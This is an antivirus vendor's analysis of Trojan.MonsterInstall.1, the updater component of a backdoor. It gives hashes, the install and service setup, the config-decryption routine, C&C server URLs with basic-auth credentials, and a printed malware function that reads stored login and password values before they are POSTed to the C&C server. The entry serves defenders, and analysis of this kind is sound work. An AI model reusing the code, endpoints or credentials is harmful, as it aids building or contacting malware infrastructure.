マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Trojan.MonsterInstall.1

Added to the Dr.Web virus database: 2019-03-28

Virus description added:

SHA1:

  • 4f053ad18150f07f15039bd845d3e2db8bd50c72 (main.js)
  • b24e8dfd44a42a74e8c47d759d36fc178d988a93 (start.js)
  • 2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 (crypto.dll)
  • d0a6fab0e4c98413f56f96d68c11ebd64db090cf (network.dll)
  • 444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 (windows.dll)
  • efe12a67e009c93f0702cc775b78bc70bdac0cd3 (service.exe)

Description

A part of the MonsterInstall trojan that’s responsible for updating the backdoor. It consists of several js-scripts and native C++ libraries.

Operating routine

The script is launched using Node.js. It installs itself in the system into the C:\Windows\Reserve Service directory and runs as a service.

Libraries:

sha1: name ts Pdb
7e6fc66e77fc02b36889043f65d9b654d826b7807z.dll09.10.2016 01:26:26
d0d68b64b39495de80add1a66ecb55cab43a6b257zip.dll16.08.2018 22:02:00B:\Develop\VisualStudioProject\module\7zip\Release\7zip.pdb
2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7crypto.dll20.08.2018 03:14:44B:\Develop\VisualStudioProject\module\crypto\Release\crypto.pdb
d0a6fab0e4c98413f56f96d68c11ebd64db090cfnetwork.dll17.08.2018 18:38:49B:\Develop\VisualStudioProject\module\network\Release\network.pdb
444d4a915ba55a46b9c551ba4a6c1398a1cd5e16windows.dll20.08.2018 22:10:36B:\Develop\VisualStudioProject\module\windows\Release\windows.pdb
efe12a67e009c93f0702cc775b78bc70bdac0cd3daemon\service.exe22.03.2013 19:31:16c:\Users\Corey\Documents\workspace\node-windows\_tmp\winsw\obj\Release\winsw.pdb

The main module of the trojan is main.js. It sends a request to google.com, yandex.ru or www.i.ua in order to obtain the current date. After that, it decrypts the contents of the file bootList.json with the help of crypto.dll library.

Decryption algorithm:


key = '123'
s = ''
for i in range(len(d)):
       s += chr((ord(d[i]) - ord(key[i % len(key)])) & 0xff)

In the decrypted .json file there’s a list of C&C servers:

[{"node":"http://cortel8x.beget.tech/reserve/","weight":10},{"node":"http://reserve-system.ru/work/","weight":10}]

The trojan then reads information from the registry:


function getInfo()
{
var WindowsNodeInfo = new Object();
WindowsNodeInfo.mainId = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "mainId");
WindowsNodeInfo.login = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "log");
WindowsNodeInfo.password = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "pass");
WindowsNodeInfo.source = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "source");
WindowsNodeInfo.updaterVersion = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "updaterVersion");
WindowsNodeInfo.workerVersion = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Windows Node", "workerVersion");
var ReserveSystemInfo = new Object();
ReserveSystemInfo.workerVersion = windowsLib.getStringRegKey("HLM\SOFTWARE\Microsoft\Reserve System", "updaterVersion");
 
var myInfo = new Object();
myInfo.windowsNode = WindowsNodeInfo;
myInfo.reserveSystem = ReserveSystemInfo;
return  JSON.stringify(myInfo);
}

After that, the sends it via POST request to the C&C server decrypted earlier. The HTTP header of the basic authentication, which corresponds to the “cortel:money” pair, is also added to the request.

The server’s response:


{
    "data": {
        "updaterVersion": [0, 0, 0, 1],
        "updaterLink": "/upd.7z",
        "updaterVerify": "£ñß(\u0012Ä\ti¾$ë5ž»\u001c²\u001c\fÙ=±÷ö‚´èUnŽÐÂBÔ\n\u001dW6?u½\u0005Œn\u000fp:üÍ\u0019\u0000\u000bSý«\u00137®÷\u0013”’ì¥û§s7F\u0016ó\\\u000f%6ñê\"7î<ýo䃃0Æ%tñÅv­‚S¡\r\u001e•ÅÆ¡¿N)v\\f8\u0004F\fUS¯‰³§ oIõŒiÆîGݪ\u0017êH/8Ö1-°™[P5E7X‡Fø%SŠXÕ6Oþ=Vô‰…ˆ:.3Œ‚i\u000eÁù9Ã&¾ŒM\u001eÛªé$\u0006#IèÞÛ\u0018À\u001b^è,ÁòÑCTXb\u001d$ç\u0004„ð¶0UVÕ»e\u001f\b\u001e¡Ä¼è+Fjúÿoâz\r!çô3xØs—_\u000b\u0017\u001fY]\u0001¥j^û\\W",
        "dateTime": 1534868028000,
        "bootList": [{
            "node": "http://cortel8x.beget.tech/reserve/",
            "weight": 10
        }, {
            "node": "http://reserve-system.ru/work/",
            "weight": 10
        }]
    },
    "dataInfo": "I`ù@ÀP‘ÈcÊÛ´#ièÒ~\u0007<\u0001Ýìûl«ÔÆq\u0013àÛ\u0003\b\u0017ÑLÁ}ÿÚ˜DS®']\u0003bf\u0003!¿Cð¸q¸ÖÜ’B¢CÄAMˆÀA¤d\u001c5¨d-\u0013‰\u0011ѼF‘|SB[¬°(ܹÈÒÜ £L\u00071¾:`\u001bŒìýKõ\"²Ÿ¸$´3™UºÅ¨J†¨cƒf¿}r;Öeì¶x‰ØKt¥‹„47a\u001e¸Ô‡ˆy\u0006•\u001b\u0004‚‹„„•ó\u001a\u0019\nu>¨)bkæ…'\u00127@é‹7µæy3ÈNrS’Mð‡\u0018\u0019¾òÓ[Žå5H‡ƒ·¦k‘¿ÉŠ&PÂÈîåÚ~M\u0010ðnáH擪xÃv cד\u0013…T…ïÑÝ\tœŽ\u0018†Æ\u00148$”Ôî"
}

The trojan compares value in the dataTime parameter to the current date. If there’s more than a week (counted in milliseconds) difference, the trojan won’t execute commands. The dataInfo parameter contains a signature (field “data”), which is checked using the embedded public main.js key. The list of servers from the “bootList” parameter is encrypted and stored inside the “bootList.json” file.

The trojan compares its version to the version stated in the ”updaterVersion” parameter in the server’s response. If the versions match, the trojan runs "upd\upd.exe” passing "main.js” as a parameter. If the version inside the server’s response is newer, the trojan downloads the upd.7z file using the link inside the "updaterLink" parameter, checks its signature and unzips it. After that, it writes in the registry version of the update [HKLM\SOFTWARE\Microsoft\Reserve System] 'updaterVersion’ and runs "upd\upd.exe” passing "main.js” as a parameter.

start.js

Launches %win%\Reserve Service\reserve.exe "main.js".

service.exe

A build of the “winsw” utitily. It uses the following xml-file with parameters:

<service>
<id>service.exe.exe</id>
<executable>C:\Windows\Reserve Service\reserve.exe</executable>
<arguments>"C:\Windows\Reserve Service\start.js" </arguments>
</service>

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android